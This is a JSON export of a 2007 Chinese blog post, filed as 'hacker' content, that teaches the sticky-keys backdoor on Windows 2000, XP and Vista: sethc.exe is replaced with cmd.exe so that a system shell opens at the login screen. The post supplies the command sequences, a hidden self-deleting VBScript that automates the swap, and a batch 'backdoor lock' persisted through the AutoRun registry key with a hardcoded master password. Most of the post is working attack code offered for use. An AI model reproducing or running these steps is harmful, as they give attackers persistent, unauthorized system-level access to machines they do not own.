{"id":184,"date":"2007-09-27T17:22:14","date_gmt":"2007-09-27T09:22:14","guid":{"rendered":"http:\/\/www.liangliang.org.cn\/blog\/?p=184"},"modified":"2007-09-27T17:22:14","modified_gmt":"2007-09-27T09:22:14","slug":"%e6%9c%80%e9%85%b7%e7%9a%84windows%e5%90%8e%e9%97%a8","status":"publish","type":"post","link":"https:\/\/www.liangliang.org.cn\/?p=184","title":{"rendered":"\u6700\u9177\u7684windows\u540e\u95e8"},"content":{"rendered":"<p>\u5728windows 2000\/xp\/vista\u4e0b\uff0c\u6309shift\u952e5\u6b21\uff0c\u53ef\u4ee5\u6253\u5f00\u7c98\u7f6e\uff0c\u4f1a\u8fd0\u884csethc.exe\uff0c\u800c\u4e14\uff0c\u5728\u767b\u5f55\u754c\u9762\u91cc\u4e5f\u53ef\u4ee5\u6253\u5f00\u3002\u8fd9\u5c31\u8ba9\u4eba\u8054\u60f3\u5230WINDOWS\u7684\u5c4f\u4fdd\uff0c\u5c06\u7a0b\u5e8f\u66ff\u6362\u6210cmd.exe\u540e\uff0c\u5c31\u53ef\u4ee5\u6253\u5f00shell\u4e86\u3002<\/p>\n<p>\u53c2\u8003McafeeAvertLabs\uff1a<br \/>\nhttp:\/\/feeds.feedburner.com\/~r\/McafeeAvertLabsBlog\/~3\/101149799\/<\/p>\n<p>XP\uff1a<br \/>\n\u5c06\u5b89\u88c5\u6e90\u5149\u76d8\u5f39\u51fa\uff08\u6216\u5c06\u786c\u76d8\u4e0a\u7684\u5b89\u88c5\u76ee\u5f55\u6539\u540d)<br \/>\ncd %widnir%\\system32\\dllcache<br \/>\nren sethc.exe *.ex~<br \/>\ncd %widnir%\\system32<br \/>\ncopy \/y cmd.exe sethc.exe<\/p>\n<p>VISTA\uff1a<br \/>\ntakeown \/f c:\\windows\\system32\\sethc.exe<br \/>\ncacls c:\\windows\\system32\\sethc.exe \/G administrator:F<br \/>\n\u7136\u540e\u6309XP\u65b9\u6cd5\u66ff\u6362\u6587\u4ef6<\/p>\n<p>\u5728\u767b\u5f55\u754c\u9762\u63095\u6b64SHIFT\uff0c\u51fa\u6765cmd shell\uff0c\u7136\u540e\u2026\u2026<\/p>\n<p>\u540e\u95e8\u6269\u5c55\uff1a<\/p>\n<p>\u8f6c\u81f3\uff1a7j blog http:\/\/1v1.name\/show-241-1.html#cm300<\/p>\n<p>\u518d\u66f4\u65b0\u4e00\u4e0b<br \/>\nDim obj, success<br \/>\nSet obj = CreateObject(\"WScript.Shell\")<br \/>\nsuccess = obj.run(\"cmd \/c takeown \/f %SystemRoot%\\system32\\sethc.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c echo y| cacls %SystemRoot%\\system32\\sethc.exe \/G %USERNAME%:F\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c copy %SystemRoot%\\system32\\cmd.exe %SystemRoot%\\system32\\acmd.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c copy %SystemRoot%\\system32\\sethc.exe %SystemRoot%\\system32\\asethc.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c del %SystemRoot%\\system32\\sethc.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c ren %SystemRoot%\\system32\\acmd.exe sethc.exe\", 0, True)<\/p>\n<p>\u7b2c\u4e8c\u53e5\u6700\u6709\u610f\u601d\u4e86.\u563f\u563f..\u81ea\u52a8\u5e94\u7b54....\u4ee5\u524d\u5c31\u9047\u5230\u8fc7\u7c7b\u4f3c\u7684\u95ee\u9898<\/p>\n<p>\u518d\u66f4\u65b0.\u52a0\u4e2a\u81ea\u5220\u9664,\u7b80\u5316\u4ee3\u7801...<br \/>\nOn Error Resume Next<br \/>\nDim obj, success<br \/>\nSet obj = CreateObject(\"WScript.Shell\")<br \/>\nsuccess = obj.run(\"cmd \/c takeown \/f %SystemRoot%\\system32\\sethc.exe&amp;echo y| cacls %SystemRoot%\\system32\\sethc.exe \/G %USERNAME%:F&amp;copy %SystemRoot%\\system32\\cmd.exe %SystemRoot%\\system32\\acmd.exe&amp;copy %SystemRoot%\\system32\\sethc.exe %SystemRoot%\\system32\\asethc.exe&amp;del %SystemRoot%\\system32\\sethc.exe&amp;ren %SystemRoot%\\system32\\acmd.exe sethc.exe\", 0, True)<br \/>\nCreateObject(\"Scripting.FileSystemObject\").DeleteFile(WScript.ScriptName)<\/p>\n<p>allyesno\u6ce8\uff1a\u5bf9\u4ed8\u6587\u4ef6\u4fdd\u62a4\u7684\u529e\u6cd5\u8fd8\u53ef\u4ee5\u53c2\u7167\u6211\u7684\u6587\u7ae0 cut wfp 's jj easily<\/p>\n<p>https:\/\/www.xfocus.net\/bbs\/index.php?act=SE&f=2&t=58099&p=269293<\/p>\n<p>\u540e\u95e8\u9501\u6269\u5c55\uff1a<\/p>\n<p>allyesno\u6ce8\uff1a\u53ef\u4ee5\u91c7\u7528cmd \u9501 \u6765\u8fdb\u884ccmdshell\u7684\u5bc6\u7801\u9a8c\u8bc1 \u563f\u563f\u3002\u3002\u3002<\/p>\n<p>\u7528\u4e0b\u9762\u7684\u540e\u95e8\u9501\u7684\u65b9\u6cd5\u662f \u628a\u4ee3\u7801\u4fdd\u5b58\u4e3abdlock.bat<\/p>\n<p>\u7136\u540e\u4fee\u6539\u6ce8\u518c\u8868\u4f4d\u7f6e\u5373\u53ef<\/p>\n<p>[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Command Processor]<br \/>\n\"AutoRun\"=\"bdlock.bat\"<\/p>\n<p>@Echo Off<br \/>\ntitle \u540e\u95e8\u767b\u9646\u9a8c\u8bc1<br \/>\ncolor a<br \/>\ncls<br \/>\nset temprandom=%RANDOM%<br \/>\necho \u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801:%temprandom%<br \/>\nset\/p check=<br \/>\nif \"%check%\"==\"%temprandom%%temprandom%\" goto passcheck<br \/>\nif \"%check%\"==\"%temprandom%\" (<br \/>\nrem \u540e\u95e8\u670d\u52a1\u5668\u9a8c\u8bc1<br \/>\nrem \u5982\u679c\u6ca1\u6709\u540e\u95e8\u9a8c\u8bc1\u670d\u52a1\u5668\u8bf7rem\u6ce8\u91ca\u6389\u4e0b\u4e00\u884c\u4ee3\u7801<br \/>\nif exist \\192.168.8.8\\backdoor$\\pass goto passcheck<br \/>\n)<br \/>\necho \u9a8c\u8bc1\u5931\u8d25<br \/>\npause<br \/>\nexit<br \/>\n:passcheck<br \/>\necho \u9a8c\u8bc1\u6210\u529f<br \/>\nIf \"%passcmdlock%\"==\"http:\/\/blog.csdn.net\/freexploit\/\" Goto endx<br \/>\nSet passcmdlock=http:\/\/blog.csdn.net\/freexploit\/<br \/>\n:allyesno<br \/>\nSet Errorlevel=&gt;nul<br \/>\nEcho \u8bf7\u8f93\u5165\u9a8c\u8bc1\u5bc6\u7801\uff1f<br \/>\nSet password=allyesno Is a pig&gt;nul<br \/>\nSet\/p password=<br \/>\nrem \u4e07\u80fd\u5bc6\u7801<br \/>\nif \"%password%\"==\"allyesno is a sb\" goto endx<br \/>\nIf %time:~1,1%==0 Set timechange=a<br \/>\nIf %time:~1,1%==1 Set timechange=b<br \/>\nIf %time:~1,1%==2 Set timechange=c<br \/>\nIf %time:~1,1%==3 Set timechange=d<br \/>\nIf %time:~1,1%==4 Set timechange=e<br \/>\nIf %time:~1,1%==5 Set timechange=f<br \/>\nIf %time:~1,1%==6 Set timechange=g<br \/>\nIf %time:~1,1%==7 Set timechange=h<br \/>\nIf %time:~1,1%==8 Set timechange=i<br \/>\nIf %time:~1,1%==9 Set timechange=j<br \/>\nset\/a sum=%time:~1,1%+%time:~1,1%<br \/>\nSet password|findstr \"^password=%timechange%%time:~1,1%%date:~8,2%%sum%$\"&gt;nul<br \/>\nIf \"%errorlevel%\"==\"0\" cls&amp;Echo \u53e3\u4ee4\u6b63\u786e&amp;Goto End<br \/>\nEcho \u8bf7\u8054\u7cfb\u745e\u661f\u5ba2\u670d\u54a8\u8be2\u6b63\u786e\u5bc6\u7801\uff01&amp;Goto allyesno<br \/>\n:End<br \/>\nSet password=&gt;nul<br \/>\nSet Errorlevel=&gt;nul<br \/>\nEcho \u5f88\u597d\uff0c\u5f88\u548c\u8c10\uff01<br \/>\n:endx<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5728windows 2000\/xp\/vista\u4e0b\uff0c\u6309shift\u952e5\u6b21\uff0c\u53ef\u4ee5\u6253\u5f00\u7c98\u7f6e\uff0c\u4f1a\u8fd0\u884csethc.exe\uff0c\u800c\u4e14\uff0c\u5728\u767b\u5f55\u754c\u9762\u91cc\u4e5f\u53ef\u4ee5\u6253\u5f00\u3002\u8fd9\u5c31\u8ba9\u4eba\u8054\u60f3\u5230WINDOWS\u7684\u5c4f\u4fdd\uff0c\u5c06\u7a0b\u5e8f\u66ff\u6362\u6210cmd.exe&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-184","post","type-post","status-publish","format-standard","hentry","category-hacker"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=184"}],"version-history":[{"count":0,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/184\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}